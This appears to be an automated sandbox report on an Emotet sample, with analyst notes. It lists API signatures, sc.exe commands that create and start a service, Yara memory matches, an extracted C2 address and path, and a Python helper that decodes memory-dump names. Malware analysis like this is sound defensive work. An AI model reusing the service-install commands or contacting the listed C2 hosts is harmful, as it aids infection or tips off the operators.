Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_0043D4B8 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_0043A174 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_0044288C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_00432A57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 10_2_0043D4DA __decode_pointer,SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0043D4B8 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0043A174 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0044288C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_00432A57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\msradvb.exe; Code function: 11_2_0043D4DA __decode_pointer,SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\sc.exe sc create nolbk binpath= 'C:\Users\user\Desktop\service.exe'
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\sc.exe sc start nolbk

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Windows\Temp\setup.exe; Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,8_2_00450149
Source: C:\Windows\Temp\setup.exe; Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,8_2_0045040D
Source: C:\Windows\Temp\setup.exe; Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,8_2_0044299D
Source: C:\Windows\Temp\setup.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,8_2_00452A2D
Source: C:\Windows\Temp\setup.exe; Code function: GetLocaleInfoA,8_2_00454AC1
Source: C:\Windows\Temp\setup.exe; Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,8_2_00452B68
Source: C:\Windows\Temp\setup.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,8_2_00452BA3
Source: C:\Windows\Temp\setup.exe; Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,8_2_00452CE0
Source: C:\Windows\Temp\setup.exe; Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,8_2_00410CB2
Source: C:\Windows\Temp\setup.exe; Code function: GetThreadLocale,GetLocaleInfoA,GetACP,8_2_0045B31C
Source: C:\Windows\Temp\setup.exe; Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,8_2_0044F836
Source: C:\Windows\Temp\setup.exe; Code function: GetLocaleInfoA,8_2_00451A2B
Source: C:\Windows\Temp\setup.exe; Code function: _LcidFromHexString,GetLocaleInfoA,8_2_00451B0D
Source: C:\Windows\Temp\setup.exe; Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,8_2_00451BA3
Source: C:\Windows\Temp\setup.exe; Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,8_2_00451C15
Source: C:\Windows\Temp\setup.exe; Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,8_2_00451DE5
Source: C:\Windows\Temp\setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,8_2_0044FEC5
Source: C:\Windows\Temp\setup.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_00451ED0
Source: C:\Windows\Temp\setup.exeCode function: _strlen,EnumSystemLocalesA,8_2_00451EA7
Source: C:\Windows\Temp\setup.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,8_2_00451F71
Source: C:\Windows\Temp\setup.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_00451F35
Source: C:\Windows\Temp\setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,9_2_00450149
Source: C:\Windows\Temp\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,9_2_0045040D
Source: C:\Windows\Temp\setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,9_2_0044299D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,9_2_00452A2D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,9_2_00454AC1
Source: C:\Windows\Temp\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,9_2_00452B68
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,9_2_00452BA3
Source: C:\Windows\Temp\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,9_2_00452CE0
Source: C:\Windows\Temp\setup.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_00410CB2
Source: C:\Windows\Temp\setup.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_0045B31C
Source: C:\Windows\Temp\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,9_2_0044F836
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,9_2_00451A2B
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,9_2_00451B0D
Source: C:\Windows\Temp\setup.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,9_2_00451BA3
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,9_2_00451C15
Source: C:\Windows\Temp\setup.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,9_2_00451DE5
Source: C:\Windows\Temp\setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,9_2_0044FEC5
Source: C:\Windows\Temp\setup.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_00451ED0
Source: C:\Windows\Temp\setup.exeCode function: _strlen,EnumSystemLocalesA,9_2_00451EA7
Source: C:\Windows\Temp\setup.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,9_2_00451F71
Source: C:\Windows\Temp\setup.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_00451F35
Source: C:\Windows\SysWOW64\msradvb.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,10_2_00450149
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,10_2_0045040D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,10_2_0044299D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,10_2_00452A2D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,10_2_00454AC1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,10_2_00452B68
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,10_2_00452BA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_00452CE0
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,10_2_00410CB2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,10_2_0045B31C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,10_2_0044F836
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,10_2_00451A2B
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,10_2_00451B0D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,10_2_00451BA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,10_2_00451C15
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_00451DE5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,10_2_0044FEC5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_00451ED0
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,EnumSystemLocalesA,10_2_00451EA7
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,10_2_00451F71
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_00451F35
Source: C:\Windows\SysWOW64\msradvb.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,11_2_00450149
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,11_2_0045040D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,11_2_0044299D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,__alloca_probe_16,_malloc,GetLocaleInfoA,MultiByteToWideChar,__freea,11_2_00452A2D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,11_2_00454AC1
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,11_2_00452B68
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,11_2_00452BA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,11_2_00452CE0
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_00410CB2
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_0045B31C
Source: C:\Windows\SysWOW64\msradvb.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,11_2_0044F836
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,11_2_00451A2B
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,11_2_00451B0D
Source: C:\Windows\SysWOW64\msradvb.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,11_2_00451BA3
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_00451C15
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,11_2_00451DE5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,11_2_0044FEC5
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_00451ED0
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,EnumSystemLocalesA,11_2_00451EA7
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,11_2_00451F71
Source: C:\Windows\SysWOW64\msradvb.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_00451F35
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\service.exe  Code function: 7_2_00371E8B cpuid 7_2_00371E8B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Temp\setup.exe  Queries volume information: C:\ VolumeInformation (observed 4 times)
Source: C:\Windows\SysWOW64\msradvb.exe  Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\service.exe  Code function: 7_2_00371B49 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00371B49
Contains functionality to query time zone information
Source: C:\Windows\Temp\setup.exe  Code function: 8_2_00445DF7 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,8_2_00445DF7
Contains functionality to query windows version
Source: C:\Windows\Temp\setup.exe  Code function: 8_2_00426264 __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,8_2_00426264
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\msradvb.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Note: the volume serial number and the Cryptography\MachineGuid value are both stable per-host identifiers; the GetSystemTimeAsFileTime/GetCurrentThreadId/GetCurrentProcessId/QueryPerformanceCounter sequence in service.exe is the standard MSVC security-cookie (/GS) initialisation and is not a detection in its own right.

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match  File source: 00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
All eight matches are in memory dumps (type: MEMORY), none in files on disk. The leading field of each dump name (00000008 to 0000000B) appears to correspond to processes 8 to 11, i.e. setup.exe and msradvb.exe, and the dumps whose fifth field is 00000040 (PAGE_EXECUTE_READWRITE) at 0x1F0000 and 0xE10000 are the best candidates for the unpacked Emotet code, since image sections are not normally mapped both writable and executable.
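To triage Yara hits like the eight above, it helps to decode the dump names into process, stage, base address and page protection and then pull out the writable-and-executable regions. The following is an added example, not from the report or from Joe Security. The field layout it assumes (process number . stage . unknown . base address . page protection . unknown, all hexadecimal) is inferred from the report itself: 00000009.00000002.* lines up with the 9_2_ code-function prefixes, and the fifth field only takes the Windows PAGE_* constant values 0x20 and 0x40. The third and sixth fields are not interpreted, and the process-number-to-image mapping is taken from the report's code-function listings.

```python
"""Decode Joe Sandbox .sdmp memory-dump names and list RWX regions.

Added example; not code from the report or from Joe Security. The name
layout (process . stage . unknown . base . protection . unknown) is
inferred from the report and is an assumption.
"""
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

# Windows memory protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

# From the report: processes 8 and 9 are setup.exe, 10 and 11 are msradvb.exe.
PROCESS_IMAGES = {
    8: r"C:\Windows\Temp\setup.exe",
    9: r"C:\Windows\Temp\setup.exe",
    10: r"C:\Windows\SysWOW64\msradvb.exe",
    11: r"C:\Windows\SysWOW64\msradvb.exe",
}

# The eight dump names listed under "Yara detected Emotet".
YARA_HITS = [
    "00000009.00000002.4301641382.0000000000651000.00000020.00000001.sdmp",
    "00000009.00000002.4300993909.00000000001F0000.00000040.00000001.sdmp",
    "0000000A.00000002.4298966674.0000000000651000.00000020.00000001.sdmp",
    "00000008.00000002.4276006913.0000000000E10000.00000040.00000001.sdmp",
    "0000000B.00000002.5988263486.00000000005E1000.00000020.00000001.sdmp",
    "0000000B.00000002.5987644935.00000000001F0000.00000040.00000001.sdmp",
    "00000008.00000002.4276050052.0000000000E21000.00000020.00000001.sdmp",
    "0000000A.00000002.4298327167.00000000001F0000.00000040.00000001.sdmp",
]


class DumpName(NamedTuple):
    process: int
    stage: int
    base: int
    protect: int


def parse_dump_name(name: str) -> DumpName:
    """Split a .sdmp file name into its hexadecimal fields (assumed layout)."""
    stem = name[:-5] if name.lower().endswith(".sdmp") else name
    fields = stem.split(".")
    if len(fields) != 6:
        raise ValueError(f"unexpected dump name layout: {name!r}")
    return DumpName(
        process=int(fields[0], 16),
        stage=int(fields[1], 16),
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
    )


def protection_name(protect: int) -> str:
    # Mask off modifiers such as PAGE_GUARD (0x100) and PAGE_NOCACHE (0x200).
    return PAGE_PROTECTION.get(protect & 0xFF, f"0x{protect:X}")


def rwx_regions(names: List[str]) -> List[Tuple[int, int]]:
    """(process, base) pairs dumped as PAGE_EXECUTE_READWRITE: the most
    likely home of an unpacked payload, since PE sections are normally
    mapped read-only or execute-read."""
    found = set()
    for d in map(parse_dump_name, names):
        if d.protect & 0xFF == 0x40:
            found.add((d.process, d.base))
    return sorted(found)


def summarize(names: List[str]) -> Dict[str, List[str]]:
    """Group hits by the image the process number maps to, one line per dump."""
    by_image: Dict[str, List[str]] = defaultdict(list)
    for d in map(parse_dump_name, names):
        image = PROCESS_IMAGES.get(d.process, f"process {d.process}")
        by_image[image].append(
            f"proc {d.process} stage {d.stage} base 0x{d.base:08X} {protection_name(d.protect)}"
        )
    return {image: sorted(lines) for image, lines in by_image.items()}


if __name__ == "__main__":
    for image, lines in summarize(YARA_HITS).items():
        print(image)
        for line in lines:
            print("  " + line)
    print("RWX regions:", [(p, hex(b)) for p, b in rwx_regions(YARA_HITS)])
```

Run over the report's names this yields four RWX regions, one per process, three of them at the same base 0x1F0000 in processes 9, 10 and 11; a shared base across separate processes of two different images is a strong hint that the same unpacking routine allocated the same region each time, so those dumps are the ones to hand to a config extractor or to diff against each other.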

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Temp\setup.exe (processes 8 and 9) and C:\Windows\SysWOW64\msradvb.exe (processes 10 and 11), the same two functions in each:
Code function 00404963: CreateBindCtx,CoTaskMemFree
Code function 00405D0F: __ehhandler$___std_fs_change_permissions@12,__EH_prolog3_GS,lstrlenW,__snprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree
Caveat: CreateBindCtx is the COM moniker bind-context API exported by ole32.dll and is unrelated to Winsock bind()/listen(); neither function contains a socket call, and __std_fs_change_permissions is part of the MSVC <filesystem> runtime. This signature is a probable false positive on the API name. The sample's actual command-and-control behaviour is better assessed from the network activity in the behavior graph and from the extracted configuration below.

Malware Configuration

Threatname: Emotet

{"C2 list": ["108.6.140.26/HgsN9LrPL"]}

The extracted entry consists of an IP address followed by a URI path. Note that the connection actually observed during the run went to 45.79.223.161 on port 443 (see the behavior graph), which is not in the extracted list; treat both addresses as indicators for this sample.

Behavior Graph

(The interactive graph and its legend are not reproduced; the information recoverable from the graph text follows. The text was cut off after the conhost.exe node.)

Behavior Graph ID: 206794; Sample: service.exe; Start date: 07/02/2020; Architecture: WINDOWS; Score: 100
Top signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for sample; 3 other signatures
Started processes: service.exe, msradvb.exe, cmd.exe (two instances)
